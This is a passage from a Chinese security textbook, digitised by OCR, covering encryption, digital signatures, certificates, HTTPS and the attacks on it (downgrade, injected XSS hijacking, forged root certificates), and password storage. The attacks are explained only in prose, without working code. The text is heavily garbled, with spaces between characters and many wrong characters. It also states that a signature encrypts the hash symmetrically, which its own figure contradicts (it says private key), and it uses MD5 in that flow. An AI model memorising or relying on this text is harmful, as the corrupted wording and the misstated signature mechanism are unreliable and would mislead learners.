开 密 钥 与 私有 密 钥 是 一 对 ， 如 果 用 公开 密 钥 对 数据 进行 加 密 ， 只 有 用 对 应 的 私有 密 钥 才能 
密 ; 如 果 用 私有 密 钥 对 数据 进行 加 密 ， 那 么 只 有 用 对 应 的 公开 密 钥 才能 解密 。 加 密 和 解密 使 
用 的 是 两 个 不 同 的 密 钥 ， 这 种 算法 叫 作 非 对 称 加 密 算 法 。 


1. 对 称 加 密 的 工作 流程 


举 个 例子 来 简要 说 明 对 称 加 密 的 工作 过 程 。 

张 三 和 李 四 是 朋友 , 张 三 住 在 北京 , 李 四 住 在 深圳 。 有 时 候 需 要 互相 寄 一 些 东西 给 对 方 ， 
但 是 这 个 东西 比较 贵 ， 为 了 保证 货物 的 安全 ， 他 们 把 东西 都 装 在 一 个 保险 箱 里 ， 将 东西 放 入 
里 面 。 两 个 保险 箱 的 钥匙 是 一 样 的 ， 在 寄 东 西 之 前 会 使 用 钥匙 把 保险 箱 锁 上 ， 收 到 东西 后 另 
一 个 人 再 用 钥匙 打开 。 

上 面 的 例子 是 将 重要 资源 安全 传递 到 目的 地 的 传统 方式 , 只 要 张 三 和 李 四 小 心 保管 好 铀 
匙 ， 即 便 有 人 得 到 保险 盒 ， 也 无 法 打开 ， 这 个 方法 常用 在 现代 通信 的 信息 加 密 中 。 

在 对 称 加 密 中 , 数据 发 送 方 将 明文 和 加 密 密 钥 一 起 经 过 特殊 加 密 算法 处 理 后 , 使 其 变 成 
复杂 的 加 密 密 文 发 送出 去 。 接 收 方 收 到 密 文 后 ， 若 想 解读 原文 ， 则 需要 使 用 加 密 密 钥 及 相同 
算法 的 逆 算 法 对 密 文 进行 解密 ， 才 能 使 其 恢复 成 可 读 明 文 。 在 对 称 加 密 算 法 中 ， 使 用 的 密 钥 
只 有 一 个 ， 发 收 信 双 方 都 使 用 这 个 密 钥 对 数据 进行 加 密 和 解密 。 

在 对 称 加 密 算法 中 ， 常 用 的 算法 有 DES、3DES、TDEA、Blowfish、RC2、RC4、RC5、 
IDEA、SKIPJACK、AES 等 。 不同 算法 的 实现 机 制 会 有 些 不 同 , 不 过 对 于 上 层 使 用 是 透明 的 ， 
所 以 会 感觉 区 别 不 大 。 

2. 非 对 称 加 密 工作 流程 

对 称 加 密 是 基于 双方 有 一 份 共同 的 密码 , 而 共同 密码 是 双方 协商 出 来 的 , 那么 如 何 保 证 
这 个 协商 过 程 不 被 人 监听 呢 ? 通俗 来 讲 ， 就 是 张 三 如 何 把 密码 告诉 李 四 ,， 但 又 不 让 其 他 人 知 
道 ， 这 时 候 就 需要 使 用 非 对 称 加 密 的 协作 了 。 

(1) 张 三 给 李 四 发 送 一 个 公 钥 。 

(2) 李 四 生 成 一 个 密码 ， 并 用 张 三 的 公 钥 加 密 后 传递 给 张 三 。 

(3) 张 三 使 用 自己 的 私 钥 进行 解密 。 

(4) 此 时 双方 都 使 用 李 四 生 成 的 密码 作为 共同 密码 。 
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在 上 面 的 流程 中 ， 即 使 攻击 者 截获 了 李 四 传 递 的 加 密 后 的 密码 ， 但 因为 没有 私 钥 ， 因 此 
无 法 还 原 出 真实 的 密码 值 。 


3. 优 缺 点 


对 称 加 密 算法 的 优点 是 算法 公开 、 计 算 量 小 、 加 密 速 度 快 、 加 密 效 率 高 。 对 称 加 密 算法 
的 缺点 是 在 数据 传送 前 ， 发 送 方 和 接收 方 必 须 商 定好 密 钥 ， 然 后 使 双方 都 能 保存 好 密 钥 。 因 
为 加 密 的 安全 性 不 仅 取决 于 加 密 算法 本 身 ， 密 钥 管 理 的 安全 性 更 加 重要 。 其 次 ， 如 果 一 方 的 
密 钥 被 泄露 ， 那 么 加 密 信息 也 就 不 安全 了 。 因 为 加 密 和 解密 使 用 同一 个 密 钥 ， 如 何 把 密 钥 安 
全 地 传递 到 解密 者 手 上 就 成 了 必须 要 解决 的 问题 。 

非 对 称 加 密 相对 来 说 安全 性 更 好 : 对 称 加 密 的 通信 双方 使 用 相同 的 密 钥 ,如果 一 方 的 密 
钥 遭 泄露 ， 那 么 整个 通信 就 会 被 破解 。 而 非 对 称 加 密使 用 一 对 密 钥 ， 一 个 用 来 加 密 ， 一 个 用 
来 解密 ， 而 且 公 钥 是 公开 的 ， 密 钥 是 自己 保存 的 ， 不 需要 像 对 称 加 密 那 样 在 通信 之 前 要 先 同 
步 密 钥 。 非 对 称 加 密 的 缺点 是 加 密 和 解密 花费 时 间 长 、 速 度 慢 ,只 适合 对 少量 数据 进行 加 密 。 
在 非 对 称 加 密 中 使 用 的 主要 算法 有 RSA、Elgamal、 背 包 算 法 、Rabin、D-H、ECC (椭圆 曲 
线 加 密 算法 ) 等 。 


5.1.2 ”数字 签名 


数字 签名 使 用 公 钥 加 密 方式 实现 用 于 鉴别 数字 信息 真 伪 的 方法 。 一 套数 字 签 名 通常 定义 
两 种 互补 的 运算 ， 一 种 用 于 签名 ， 另 一 种 用 于 验证 。 
9 ”数字 签名 不 是 指 将 签名 扫描 成 数字 图 像 或 者 用 触摸 板 获取 的 签名 ， 更 不 是 落款 。 
9 已 经 有 数字 签名 的 文件 的 完整 性 是 很 容易 验证 的 ， 而 且 数 字 签 名 具有 不 可 否认 性 ， 
不 需要 笔迹 专家 来 验证 。 


1. 签名 流程 


数字 签名 应 用 了 公 钥 密码 领域 使 用 的 单 向 函数 原理 。 单 向 函数 指 的 是 正 向 操作 非常 简 
单 ， 而 逆向 操作 非常 困难 的 函数 ， 比 如 大 整数 乘法 。 这 种 函数 往往 提供 一 种 难 解 或 怀疑 难 解 
的 数学 问题 。 

如 图 5-1 所 示 ， 数 字 签名 就 是 将 一 段 数据 使 用 MD5 加 密 ， 得 到 一 个 hash 值 ， 把 hash 值 再 
次 对 称 加 密 ， 得 到 的 值 就 是 数字 签名 部 分 ， 服务 端 再 把 数据 与 签名 发 送出 去 ， 客 户 端 收 到 数 
据 后 , 会 同样 把 数据 使 用 MD5 加 密 , 得 到 一 个 hash 值 , 再 把 数字 签名 解密 , 得 到 发 送 方 的 hash 
值 ， 判 断 两 个 hash 值 是 否 一 致 ， 如 果 一 致 ， 就 代表 数据 没有 被 算 改 。 
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网 页 内 容 A 


hash 出 的 
摘要 B 

用 私 钥 对 B 
进行 加 密 C 


5.1.3 ”数字 证 书 


前 面 提 到 了 对 称 加 密 、 非 对 称 加 密 以 及 数字 签名 , 虽然 保证 了 数据 传输 的 安全 性 ,但 是 
没有 解决 钓鱼 网 站 冒充 服务 器 的 问题 。 假 设 有 一 个 钓鱼 网 站 随便 生成 密 钥 对 ,把 公 钥 发 给 客 
户 ， 并 告知 客户 “我 是 某 某 银行 网 站 ”， 客户 是 无 法 分 辨 此 消息 的 真 假 的 。 因 为 钓鱼 网 站 也 
能 完成 数据 加 密 部 分 的 步骤 ， 所 以 如 何 鉴别 网 站 服务 方 的 合法 性 就 是 数字 证 书 需要 考虑 的 
问题 。 


1. 数字 证 书 介绍 


数字 证 书 (Digital Certificate ) 又 称 公开 密 钥 证 书 、 公 钥 证 书 、 数 字 认 证 、 身 份 证 书 (Identity 
Certificate) 、 电 子 证 书 或 安全 证 书 ， 是 用 于 公开 密 钥 基础 建设 的 电子 文件 ， 用 来 证 明 公 开 
密 钥 拥有 者 的 身份 。 

证 书 文件 包含 公 钥 信息 、 拥 有 者 身份 信息 〈 主 体 ) 以 及 数字 证 书 认 证 机 构 〈 发 行者 ) 对 
这 份 文件 的 数字 签名 ， 以 保证 这 个 文件 的 整体 内 容 正确 无 误 。 拥 有 者 凭借 数字 证 书 可 向 用 户 
表明 身份 ， 从 而 获得 对 方 的 信任 并 授权 访问 或 使 用 某 些 敏感 的 计算 机 服务 。 

计算 机 系统 或 其 他 用 户 可 以 通过 一 定 的 程序 核实 证 书 上 的 内 容 , 包括 证 书 是 否 过 期 、 数 
字 签 名 是 否 有 效 ， 如 果 信 任 签发 的 机 构 ， 就 可 以 信任 证 书 上 的 密 钥 ， 赁 公 钥 加 密 ， 与 拥有 者 
进行 可 靠 的 通信 。 









服务 器 把 网 页 内 容 发 送 给 用 户 



















A+ 数 字 签名 (C+ 公 钥 ) 








图 5-1 数字 签名 流程 图 
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2. 使 用 场景 举例 

现在 有 这 样 一 个 应 用 场景 , 张 三 想 给 李 四 发 消息 , 想 把 消息 保密 传输 ， 此 时 张 三 的 签名 
算法 需要 有 如 下 特性 : 

(1) 确认 消息 在 传输 过 程 中 没有 丢失 ， 没 被 中 间 人 自 改 完整 性 )。 

(2) 确认 消息 的 发 送 者 是 发 布 公 钥 的 张 三 〈 认 证 ) 。 

张 三 想 要 达到 上 面 的 两 点 效果 , 可 以 使 用 数字 签名 加 数字 证 书 来 解决 , 首先 保证 数据 的 
完整 性 可 以 通过 数字 签名 , 但 数据 的 完整 性 并 不 代表 数据 就 是 张 三 发 过 来 的 ， 因为 网 络 中 任 
意 一 台 计算 机 都 可 以 给 李 四 发 送 一 个 公 钥 ， 然 后 告诉 李 四 他 的 消息 内 容 ， 虽 然 能 看 到 消息 ， 
但 是 却 不 能 证 明 他 是 张 三 。 

在 这 个 时 候 , 张 三 和 李 四 就 协商 找 一 个 担保 人 来 确认 其 身份 , 首先 张 三 向 担保 人 要 一 个 
身份 证 书 ， 每 次 张 三 发 消息 前 会 给 李 四 发 送 此 证 书 ， 李 四 拿 到 证 书后 会 找到 担保 人 确认 真 
实 性 。 

确认 其 身份 真实 之 后 ， 再 检查 其 内 容 的 完整 性 ， 都 没 问题 之 后 再 与 之 通信 。 上 述 的 担保 
人 是 电子 商务 认证 授权 机 构 (Certificate Authority，CA) 。 


最 近 几 年 各 大 厂商 极力 推广 使 用 HTTPS， 比 如 2016 年 10 月 ， 苹 果 公 司 要 求 iOS 9 和 OSX 
10.11 的 App 使 用 HTTPS， 并 告知 开发 者 ， 未 来 App 如 果 没 有 使 用 HTTPS， 将 无 法 上 架 到 
AppStore。 再 比如 ， 浏 览 器 厂商 Chrome/Firefox 已 经 将 使 用 HTTP 协 议 的 网 站 标记 为 不 安全 。 

那 什么 是 HTTPS 呢 ?HTTPS 是 以 安全 为 目标 的 HTTP 通 道 ， 简 单 来 讲 ， 是 HTTP 的 安全 
版 ， 在 数据 传输 过 程 中 全 程 进行 加 密 ， 而 非 明文 传输 。 

本 节 将 主要 介绍 HTTPS 的 作用 、 加 密 原理 、SSL 证 书 、HTTPS 中 间 人 攻击 等 相关 内 容 。 


5.2.1 HTTPS 简介 


HTTPS 的 用 处 非常 广泛 ,在 一 些 对 安全 需求 比较 高 的 网 站 都 有 大 量 使 用 ， 比 如 银行 、 商 
城 、 购 物 等 网 站 ，HTTPS 主 要 可 以 满足 以 下 3 点 需求 。 


4 内容 加 密 : 浏览 器 到 服务 器 的 内 容 都 是 以 加 密 形式 传输 的 ， 中 间 人 无 法 直接 查看 原 
始 内 容 。 
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多 身份 认证 : 保证 用 户 访问 的 网 站 没有 被 劫持 ， 即 使 被 DNS 劫持 到 了 第 三 方 站 点 ， 
也 会 提醒 用 户 没有 访问 到 可 信 的 站 点 ， 存 在 被 劫持 的 可 能 。 
9 数据 完整 性 。 防 止 内 容 被 第 三 方 冒 充 或 者 自 改 。 


1. HTTPS 与 HTTP 的 区 别 


HTTPS 的 优势 非常 多 ， 目 前 大 多 数 大 型 网 站 已 经 切换 成 HTTPS 了 。 下 面 就 HTTPS 与 
HTTP 的 主要 区 别 做 一 下 介绍 。 


(1) HTTPS 协 议 需 要 到 CA 申请 证 书 ， 一 般 免 费 证 书 很 少 ， 通 常 需要 交 费 ， 而 HTTP 则 
不 需要 申请 证 书 ， 可 以 直接 通过 Web 服 务 器 搭建 网 站 服务 。 

(2) HTTP 是 超 文 本 传输 协议 ， 信 息 是 明文 传输 ，HTTPS 则 是 具有 安全 性 的 ssl 加 密 传 
输 协议 。 

(3) HTTP 和 HTTPS 使 用 的 是 完全 不 同 的 连接 方式 ， 用 的 端口 也 不 一 样 ， 前 者 是 80, 后 
者 是 443。 

(4) HTTPS 协 议 是 由 SSL+HTTP 协 议 构 建 的 可 进行 加 密 传输 、 身 份 认证 的 网 络 协议 ， 
而 HTTP 则 是 明文 传输 ， 中 间 也 没有 经 过 任何 认证 来 保障 所 访问 的 网 页 非 钓鱼 站 点 ， 所 以 
HTTPS 要 比 HTTP 协 议 安全 。 


2. 解决 主机 信任 问题 


采用 HTTPS 的 服务 器 必须 从 CA 申请 一 个 用 于 证 明 服 务 器 用 途 类 型 的 证 书 。 该 证 书 只 有 
用 于 对 应 服务 器 的 时 候 ， 客 户 端 才 信任 此 主机 。 所 以 所 有 银行 系统 网 站 ， 关 键 部 分 应 用 的 都 
是 HTTPS。 客 户 通过 信任 该 证 书 从 而 信任 该 主机 。 


3. 认证 等 级 


一 般 意义 上 的 HTTPS 是 指 单项 认证 , 就 是 服务 器 有 一 个 证 书 , 不 需要 验证 客户 端 , 一 些 
更 加 严格 的 场景 会 用 到 双向 认证 。 例如， 银行 发 的 “K 宝 ”“U 盾 ”等 工具 就 需要 双向 认证 。 

(1) 单项 认证 

多 主要 目的 是 保证 用 户 访问 的 服务 器 是 真实 可 信 的 服务 器 ， 而 非 冒牌 网 站 。 

@ 服务 端 和 客户 端 之 间 的 所 有 通信 都 是 加 密 的 。 

多 具体 地 讲 ， 是 客户 端 产 生 一 个 对 称 的 密 钥 ， 通 过 服务 器 的 证 书 来 交换 密 钥 ， 即 一 般 
意义 上 的 握手 过 程 。 

多 接 下 来 所 有 的 信息 往来 都 是 加 密 的。 第 三 方 即 使 截获 ， 也 没有 任何 意义 ， 因 为 他 没 
有 密 钥 ， 当 然 纂 改 也 就 没有 什么 意义 了 。 
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(2) 双向 认证 

在 某 些 认 证 场合 ， 服 务 器 也 会 对 客户 端 有 访问 限制 ， 会 要 求 客户 端 必须 有 一 个 证 书 ， 比 
如 各 大 银行 的 网 银 通 常会 配备 一 个 类 似 “U 盾 ”的 硬件 ， 而 这 个 “U 盾 ”实际 上 就 是 一 个 客 
户 端 证 书 , 还 有 一 个 场景 是 支付 宝 的 数字 证 书 。 双 向 认证 的 学 习 成 本 相对 来 说 比较 高 ， 因 此 
一 般 使 用 单项 认证 即 可 。 


5.2.2 HTTPS 被 攻击 的 方式 


当 开发 者 看 到 自己 的 域名 变 为 绿色 可 信 提 示 后 ， 会 觉得 网 站 的 各 种 劫持 广告 都 不 会 再 
有 ,， 用户 的 隐私 也 都 保密 了 。 在 大 部 分 情况 下 确实 是 这 样 的， 不 过 某 些 情况 下 攻击 者 仍然 有 
可 能 对 HTTPS 进 行动 持 ， 下 面 是 3 个 比较 常见 的 方式 。 


1. 降级 攻击 


可 以 想象 一 下 ， 我 们 平时 打开 一 个 网 站 的 方式 有 很 多 种 ， 其 中 有 三 种 经 常用 到 ， 即 直接 
输入 域名 、 通 过 搜索 引擎 进入 、 从 其 他 网 站 链接 进来 。 这 三 种 可 以 想象 得 到 ， 第 一 次 与 页 面 
建立 连接 都 有 可 能 使 用 HTTP， 比 如 在 输入 域名 的 时 候 ， 大 部 分 用 户 是 不 会 输入 https:// 的 ， 
而 是 直接 输入 域名 ， 浏 览 器 默认 会 访问 HTTP 服 务 ， 如 果 服 务 器 强制 使 用 HTTPS， 就 会 发 送 
一 个 301 或 302 跳 转 ， 让 用 户 跳 转 到 对 应 的 HTTPS 服 务 。 

问题 就 出 在 这 里 ， 我 们 知道 HTTP 是 明文 的 ， 也 就 是 说 用 户 第 一 次 访问 网 站 时 ， 攻 击 者 
是 可 以 看 见 的 ， 于 是 攻击 者 可 以 监听 此 请 求 。 如 果 返 回信 息 中 包含 301 跳 转 并 跳 转 到 对 应 的 
HTTPS， 便 将 其 拦截 下 来 ， 然 后 伪装 成 用 户 与 服务 器 通信 ， 并 把 服务 器 返回 的 HTML 中 的 
HTTPS 链 接 全 部 替换 成 HTTP， 再 返回 给 用 户 。 用 户 现在 请 求 的 服务 依然 是 HTTP， 并 且 页 面 
中 的 链接 也 都 是 HTTP 链 接 ， 攻 击 者 每 次 都 做 此 操作 ， 便 能 达到 劫持 用 户 的 效果 。 

这 种 攻击 方法 对 于 用 户 来 说 并 不 是 与 服务 器 相连 接 ， 而 是 与 攻击 者 的 服务 器 通过 HTTP 
协议 连接 ， 这 种 将 HTTPS 协 议 改 变 为 HTTP 协 议 称 为 降级 攻击 。 


2. 浏览 器 恶意 插件 
前 面 提 到 攻击 者 可 能 把 HTTPS 降 级 为 HTTP 来 进行 动 持 ,不 过 现在 随 着 前 端 语言 的 发 展 ， 
页 面 内 容 不 再 单一 化 ， 很 多 DOM 元 素 都 可 以 通过 Ajax 来 获取 ， 比 如 下 面 的 代码 : 


$agreement = "https://"; 
S$url = $agreement+'localhost/home.php'; 


上 面 的 代码 不 在 A 链接 中 ， 所 以 攻击 者 很 难 分 析出 此 字符 是 否 为 一 个 URL。 此 方法 现在 
很 多 攻击 者 已 经 废弃 ， 而 是 采用 更 为 先进 的 前 端 动 持 方式 。 
前 端 动 持 与 降级 攻击 很 多 地 方 类 似 , 不 过 在 蔡 换 元 素 上 有 所 区 别 : 服务 端 依然 是 劫持 第 
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一 次 HTTP 请 求 ， 然 后 模拟 用 户 与 服务 器 通信 ， 得 到 数据 后 ， 不 再 蔡 换 链接 地 址 ， 而 是 在 
<head></head> 标 签 内 插入 XSS 代 码 ， 然 后 返回 给 用 户 ， 用 户 现在 与 攻击 者 是 HTTP 链 接 ， 但 
是 页 面 内 容 依然 是 HTTPS 链 接 ， 所 以 用 户 单 击 A 链 接 或 提交 表单 时 ，XSS 代 码 钧 子 事件 迅速 
接管 现场 ， 并 把 其 链接 更 改 为 HTTP 链 接 ， 所 以 用 户 依然 打开 的 是 HTTP 链 接 。 

3. 伪造 证 书 

前 面 提 到 的 都 是 把 协议 改 为 HTTP 链 接 ， 因 为 大 部 分 用 户 并 不 知道 网 站 本 应 该 是 HTTPS 
协议 还 是 HTTP 协 议 ， 所 以 仍然 会 去 访问 ， 但 一 些 懂 技术 的 用 户 或 者 老 用 户 发 现 网 站 从 原来 
的 HTTPS 变 成 了 HTTP 后 ， 可 能 还 是 会 有 一 些 警 觉 ， 就 不 继续 访问 了 。 因 此 攻击 者 采用 了 一 
种 新 方法 ,伪造 一 个 假 证 书 来 与 用 户 通 信 ， 就 是 攻击 者 直接 在 用 户 计算 机 的 根 证 书 中 添加 一 
个 假 证 书 ， 还 有 某 些 证 书 机 构 认 证 不 严格 ， 就 随意 颁发 了 一 个 证 书 。 

下 面 来 看 一 个 例子 ，2017 年 10 月 左右 ，360 团 队 发 现 了 一 个 恶意 网 站 伪装 成 色情 网 站 ， 
当 用 户 单 击 播放 时 ， 便 提示 用 户 下 载 播放 器 ， 如 果 用 户 下 载 了 播放 器 ， 此 播放 器 会 向 用 户 计 
算 机 插入 一 个 假 的 根 证 书 ， 此 根 证 书 对 指定 的 域名 采取 全 部 通过 的 策略 。 

之 后 该 播放 器 再 次 接管 了 系统 的 代理 服务 器 ， 当 有 用 户 访问 某 个 网 站 时 , 便 对 其 进行 动 
持 ， 之 后 模拟 用 户 与 服务 器 连接 ， 最 后 把 数据 自己 加 密 返 回 给 用 户 ， 同 时 返回 伪造 的 证 书 ， 
而 用 户 计算 机 此 前 已 经 被 植 入 了 假 的 根 证 书 ， 因 此 用 户 便 被 神 不 知 鬼 不 觉 地 算 改 了 网 站 
数据 。 
5.2.3 ”常见 误区 


随 着 主流 浏览 器 Chrome、 火 狐 等 对 非 HTTPS 页 面 亮 出 警告 ， 百 度 站 长 平台 升级 HTTPS 
认证 工具 等 举措 ， 出 于 安全 考虑 ， 越 来 越 多 的 开发 者 意识 到 安装 SSL 证 书 的 必要 性 。 但 是 对 
于 HTTPS 和 SSL 证 书 的 功能 、 使 用 、 性 能 ， 还 有 不 少 理解 上 的 误区 ， 所 以 这 里 笔者 对 这 些 误 
区 做 一 下 说 明 ， 让 大 家 能 将 HTTPS 和 SSL 证 书 更 好 地 应 用 于 网 络 安全 中 。 


误区 一 : 使 网 站 访问 速度 变 慢 


从 理论 上 来 说 ， 因 为 HTTPS 比 HTTP 多 出 了 SSL 握 手 环节 ， 不 了 解 的 人 可 能 认为 增加 这 
一 环节 会 使 得 网 站 的 访问 速度 变 慢 , 事实 上 , 这 个 环节 耗费 的 时 间 仅 有 几 百 毫秒 (0.1 秒 =100 
毫秒 ) ， 所 以 很 难 发 觉 速度 上 的 变化 。 

比较 典型 的 是 百度 、 淘 宝 等 网 站 均 实现 了 HTTPS, 但 是 访问 速度 并 没有 下 降 。 更 多 的 情 
况 是 ，HTTPS 会 比 HTTP 快 一 点 ， 尤 其 是 在 一 些 二 级 或 三 级 的 小 型 运营 商 网络 中 。 因 为 很 多 
时 候 , 小 运营 商会 截取 并 分 析 用 户 的 网 络 通信 , 但 当 它 遇 到 HTTPS 连 接 时 , 就 只 能 直接 放行 ， 
因为 HTTPS 经 过 加 密 无 法 被 解读 ， 少 了 这 个 解读 过 程 后 ， 用 户 可 能 访问 HTTPS 会 更 快 。 
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误区 二 : HTTPS 会 大 幅 增加 硬件 成 本 


为 了 实现 HTTPS, 升级 CPU 和 购买 更 多 服务 器 已 经 成 为 历史 。 随 着 硬件 性 能 的 突飞猛进 ， 
HTTPS 施 加 在 硬件 上 的 运算 压力 已 经 越 来 越 小 , 硬件 成 本 增加 几乎 可 以 忽略 不 计 。 另外， 随 
着 云 服 务 器 的 兴起 ， 使 用 弹性 云 计算 也 可 以 很 方便 地 进行 性 能 升级 ， 因 此 无 须 太 过 担心 此 
问题 。 


误区 三 : 涉及 交易 的 网 站 才 需 要 HTTPS 


目前 ， 对 于 银行 、 电 商 、 金 融 等 领域 的 网 站 ， 启 用 HTTPS 已 经 达成 共识 ， 而 其 他 类 型 的 
网 站 大 多 数 还 尚未 使 用 HTTPS， 导 致 大 家 认为 只 要 不 涉及 交易 ， 便 可 以 不 使 用 HTTPS， 其 实 
这 个 想法 是 错误 的 。 
目前 , 国内 网 络 安全 环境 并 不 乐观 ， 比 如 经 常 能 看 到 某 一 个 网 站 上 有 一 些 广 告 , 而 这 些 
告 可 能 并 不 是 网 站 管理 员 所 投放 的 ， 而 是 一 些 二 级 或 三 级 运营 商 修改 了 网 页 内 容 导 致 的 。 
另外 ， 目 前 Chrome、 火 狐 等 各 大 主流 浏览 器 已 经 开始 对 非 HTTPS 页 面 进行 警告 ,谷歌 、 百 
度 均 给 予 HTTPS 页 面 更 高 的 搜索 权重 。 因 为 无 论 从 安全 角度 还 是 SEO 优 化 的 角度 ，HTTPS 
对 各 个 类 型 的 网 站 都 非常 必要 。 


误区 四 : 在 登录 页 面部 署 HTTPS 即 可 


在 登录 页 面部 署 HTTPS 能 够 避免 信息 被 截取 , 至 于 其 他 页 面 就 不 用 了 , 这 种 想法 是 很 危 
险 的 。 因 为 如 果 只 是 登录 页 面 使 用 了 HTTPS， 在 登录 以 后 ， 其 他 页 面 就 变 成 了 HTTP， 这 时 
页 面 缓存 数据 就 暴露 了 。 也 就 是 说 ， 这 些 缓存 数据 是 在 HTTPS 环 境 下 建立 的 ， 但 却 在 HTTP 
环境 下 传输 。 如 果 有 人 劫持 到 这 些 缓存 数据 ， 信 息 就 可 能 被 窃取 。 正 是 基于 这 个 原因 ， 目 前 
有 很 多 网 站 都 从 单一 的 登录 页 面 HTTPS 升 级 为 全 站 HTTPS 。 


误区 五 :HTTPS 网 站 彻底 安全 


在 浏览 器 以 及 一 些 网 站 的 宣传 下 ， 很 多 用 户 甚 至 部 分 开发 者 会 产生 HTTPS 是 万 能 的 想 
法 。 只 要 有 了 HTTPS， 网 站 就 一 定安 全 了 。 实际 上 ，HTTPS 只 是 解决 了 网 络 通信 传输 加 密 和 
服务 器 身份 验证 这 两 个 需求 ， 而 防 窃取 、 防 自 改 、 防 钓鱼 并 不 是 HTTPS 所 能 解决 的 问题 。 但 
是 传输 加 密 和 身份 验证 是 网 站 安全 的 基础 ， 基 础 都 打 不 好 ， 安 全 就 是 空谈 。 

















对 于 Web 系 统 账 户 体系 设计 来 说 ， 用 户 密码 通常 会 被 存储 在 数据 库 中 ， 大 部 分 网 站 都 会 
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把 密码 进行 加 密 后 再 存储 , 也 有 少 部 分 系统 直接 存储 明文 的 用 户 密码 , 明文 存储 用 户 密码 对 于 
用 户 和 网 站 安全 两 方面 来 说 都 是 非常 不 负责 任 的 ， 同 样 不 安全 的 密码 加 密 也 是 不 负责 任 的 。 

本 节 将 分 析 哪 些 加 密 方式 不 可 靠 , 同时 给 出 建议 使 用 的 加 密 方式 。 另外， 用户 密码 泄露 
不 仅仅 是 数据 库 泄露 ， 也 有 可 能 是 网 络 传输 中 被 截获 造成 的 ， 因此 本 节 内 容 包 含 密码 的 存储 
方案 和 传输 方案 。 


5.3.1 ”密码 存储 


2014 年 ，12306 被 撞 库 扫 号 ， 其 根本 原因 是 一 些 企业 发 生 了 信息 泄露 事件 ， 且 这 些 泄露 
数据 未 加 密 或 者 加 密 方式 比较 弱 ， 导 致 黑客 可 以 还 原 出 原始 的 用 户 密 码 。 目 前 已 经 曝光 的 信 
息 泄 露 事件 至 少 上 百 起 ， 其 中 包括 多 家 一 线 互 联网 公司 ， 泄 露 总 数据 超过 10 亿 条 。 

要 完全 防止 信息 泄露 是 非常 困难 的 事情 ， 除 了 防止 黑客 外 ， 还 要 防止 内 部 人 员 泄 密 。 但 
如 果 采 用 合适 的 算法 去 加 密 用 户 密码 , 即使 信息 泄露 出 去 , 黑客 也 无 法 还 原 出 原始 的 密码 (或 
者 还 原 的 代价 非常 大 ) 。 也 就 是 说 ， 开 发 者 可 以 将 工作 重点 从 防止 泄露 转换 到 防止 黑客 还 原 
出 数据 。 

如 果 设 计 出 一 个 绝对 安全 的 密码 系统 呢 ? 极端 的 方法 是 系统 完全 不 接触 密码 , 用户 的 身 
份 认证 转 而 交 由 受信 任 的 第 三 方 来 完成 ， 比 如 OpenID 这 样 的 解决 方案 。 系 统 向 受信 任 的 
第 三 方 求证 用 户 身份 的 合法 性 ， 用 户 通过 密码 向 第 三 方 证 明 自 己 的 身份 。 

这 样 密码 完全 不 经 过 系统 , 系统 也 就 不 用 绞 尽 脑汁 保证 密码 的 安全 了 。 这 个 做 法 对 用 户 
来 说 还 有 个 额外 的 好 处 一 一 再 也 不 用 为 每 个 应 用 注册 账号 了 , 同一 个 OpenID 就 可 以 登录 所 有 
支持 OpenID 的 系统 。 

这 种 方式 的 安全 性 虽然 非常 好 , 不 过 作为 一 个 自主 的 系统 , 平台 的 用 户 资源 不 能 掌握 在 
自己 手 上 ， 还 需要 与 其 他 厂商 共享 ， 这 多 少 有 点 让 人 难以 接受 。 本 节 将 分 别 介绍 用 户 密码 的 
加 密 方式 以 及 攻击 者 的 几 种 解密 方法 。 

1. 不 安全 的 密码 策略 

目前 ， 有 一 些 网 站 用 户 密码 处 理 得 很 不 规范 ， 存 在 明文 密码 泄露 的 情况 。 如 果 你 在 一 个 
网 站 注册 了 ， 隔 了 一 段 时 间 把 密码 忘 了 ， 网 站 可 以 通过 你 注册 的 Email 或 者 手机 号 码 告诉 你 
原来 的 密码 是 什么 。 

这 时 候 你 就 得 当心 了 ， 既 然 网 站 能 知道 你 的 密码 明文 ,那么 网 站 的 工作 人 员 就 可 能 知道 
你 的 密码 明文 ， 攻 击 者 攻击 进来 之 后 ， 也 可 能 还 原 出 你 的 密码 对 应 的 明文 。 另 外 ， 存 在 明文 
密码 的 网 站 本 身 也 很 有 可 能 用 心 不 良 。 

下 面 几 种 方法 的 共同 点 是 可 以 从 存储 的 密码 形式 还 原 密码 的 明文 。 
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(1) 明文 存储 
这 种 方法 密码 本 身 的 安全 性 比 系统 还 低 ， 系 统管 理 员 可 以 直接 看 到 所 有 用 户 的 密码 明 
文 。 除 非 你 是 做 恶意 网 站 ， 故 意 套 取 用 户 密码 ， 否 则 不 要 用 这 种 方式 。 


(2 ) 对 称 加 密 

用 户 密码 明文 的 安全 性 等 同 于 加 密 密 钥 本 身 的 安全 性 。 对 称 加 密 的 密 钥 会 同时 用 于 加 密 
和 解密 ， 所 以 它 会 直接 出 现在 加 密 代 码 中 ， 破 解 的 可 能 性 也 相当 大 。 而 且 知道 密 钥 的 人 很 可 
能 就 是 系统 管理 员 ， 所 有 人 的 密码 原文 他 都 能 算出 来 。 


(3 ) 非 对 称 加 密 

密码 的 安全 性 等 同 于 私 钥 的 安全 性 。 密 码 明文 经 过 公 钥 加 密 , 而 要 还 原 明文 ， 则 必须 要 
私 钥 才 行 。 因 此 只 要 保证 私 钥 的 安全 ,密码 明文 就 会 安全 。 私 钥 可 以 由 某 个 受信 任 的 人 或 机 
构 来 掌管 ， 普 通 的 身份 验证 只 需要 用 公 钥 加 密 就 可 以 了 ， 这 里 的 关键 是 私 钥 的 安全 ， 如 果 私 
钥 泄露 ， 那 么 密码 明文 就 危险 了 。 


2. 安全 的 密码 策略 


最 好 是 以 连 开发 者 自己 都 不 可 能 还 原 明文 的 方式 来 保存 , 也 就 是 常用 的 利用 哈 希 算法 的 
单 向 性 来 保证 明文 的 信息 以 不 可 还 原 的 有 损 方式 进行 存储 。 下 面 是 几 种 不 可 逆 加 密 方案 。 


(1 ) 哈 希 加 密 存 储 

使 用 MD5 或 SHA-1 进 行 哈 希 加 密 存储 ， 这 两 个 算法 相对 速度 较 快 ， 也 就 意味 着 对 暴力 破 
解 来 说 消耗 的 资源 少 。 另 外 ， 这 种 方案 也 是 最 常见 的 加 密 方案 ， 不 过 由 于 使 用 的 人 数 过 多 ， 
有 很 多 黑客 在 这 方面 下 了 很 多 功夫 ， 因 此 建议 不 要 使 用 这 种 加 密 算法 。 

(2) SHA-256 加 密 

SHA-256 是 一 种 更 安全 、 成 熟 的 加 密 算法 , 但 使 用 这 种 加 密 算法 只 是 在 一 定 程度 上 增加 
